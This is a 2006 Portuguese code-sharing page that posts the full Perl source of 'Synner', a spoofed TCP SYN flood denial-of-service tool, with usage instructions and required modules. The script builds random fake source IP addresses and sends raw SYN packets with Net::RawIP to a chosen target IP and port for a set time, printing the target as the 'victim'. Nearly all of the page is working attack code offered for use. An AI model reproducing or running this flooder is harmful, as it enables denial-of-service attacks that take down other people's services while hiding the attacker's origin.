Synner Novo Sys(TCP) Flooder em Perl
Publicado por Franzé Jr Magalhães 01/01/2006
[ Hits: 10.612 ]
Ferramenta muito similar a outros flooders Sys TCP. Essa trabalha mandando pacotes Sys ao host e a porta específicada. Diferente de outros flooders, Synner consome toda a conexão.
Ex.: ./ 80 10
É necessário que você tenha o Net::RawIP instalado.
# WARNING: Never tested in real world :}
Garanto que eu também não testei, mas existe um comentário na Securiteam que é uma ótima ferramenta.
#!/usr/bin/perl # # # # Other Spoof-DoS tool written by nuTshell # <carloslack at gmail dot com> # <> # # Description: # This small tool is similar many other tcp syn flooders out there. # It works sending syn tcp packets to destination host:port, # spoofing it`s own ip addresses by sending randon source host:port # packets. # Be carefull, becouse you really need strong link otherwise # you`ll get f*. Unlike , consumes much # bandwidth resources. # # Required: # Install Net::RawIP from cpan or get it`s .tar,gz from somewhere. # It`s up to you. # # This tool does SPOOF your ip. # # Run it as ROOT (Net::RawIP needs). # Usage: ./ <ip> <port> <time> # # Greetz goes to: Shorgen, hexdump, Codak, khz, spidersoft, # Barros, xgc, btaranto, Acid-Warz, F-117... # # WARNING: Never tested in real world :} # #Make sure to get and install this module from cpan: use Net::RawIP; #Display help message: sub usage() { die "Use $0 <ip> <port> <time>n"; } #Function to control synner`s execution time: sub get_time() { $finaltime = time; $endme = $finaltime-$begintime; } #Bit useless...: if (@ARGV>3) {&usage} $ipdest = $ARGV[0] or &usage; $destport = $ARGV[1] or &usage; #Time is required to avoid endless execution (keep in mind that synner eats bandwidth): $time = $ARGV[2] or &usage; #Source port of our packets, include as many as you want: @tmpport = (1756,1026,1739,4055,2001,3055,1999,2873,20000,5476,9132,6000,9000,1234); #2 arrays that will give us randon ip addr: @iparray_round1 = (1,2); @iparray_round2 = (0,1,2,3,4,5,6,7,8,9); print "[!] spoof-DoS tool written by nuTshelln"; print "[!] You better have huge link :)n"; print "[!] Time: $timen"; print "[!] Destination victin-> $ipdest:$destportn"; #Set $packet as handle of our raw packets: $packet = new Net::RawIP; #Get start time: $begintime = $^T; #Call get_time(): get_time(); while($endme < $time) { #Now build randon for ($z=0;$z<4;$z++) { #I use number 2 for every first numbers of each octet: for($I=0;$I<1;$I++) { $ip .= 2; } #Here i keep two options for every second numbers of each octet: for($kick=0;$kick<1;$kick++) { $iparray_round1 = $iparray_round1[rand(@iparray_round1)] ; $ip .= $iparray_round1; } #For all the last third of each octets i use range between 0<->9: for($you=0;$you<1;$you++) { $iparray_round2 = $iparray_round2[rand(@iparray_round2)] ; $ip .= $iparray_round2; } #Insert dot between each octet: $ip .= "."; } #The last one dot must be erased: chop($ip); #Routine to create/send spoofed packets, thanks to Net::RawIP: $tmpport = $tmpport[rand(@tmpport)]; $packet->set( { ip => { saddr => $ip, #Victin ip daddr => $ipdest #Victin port }, tcp => { source => $tmpport, #Source ip(Spoofed and randomized) dest => $destport, #source port(Randomized) psh => 1, ack => 0, syn => 1, data => '31337' } } ); #Send it: $packet->send(0,1) ; print "[*] From-> $ip:randon_portr"; #Reset last ip for new one: $ip = ''; #Call get_time(): get_time(); } #That`s all folks! print "nDone!n"; #eof
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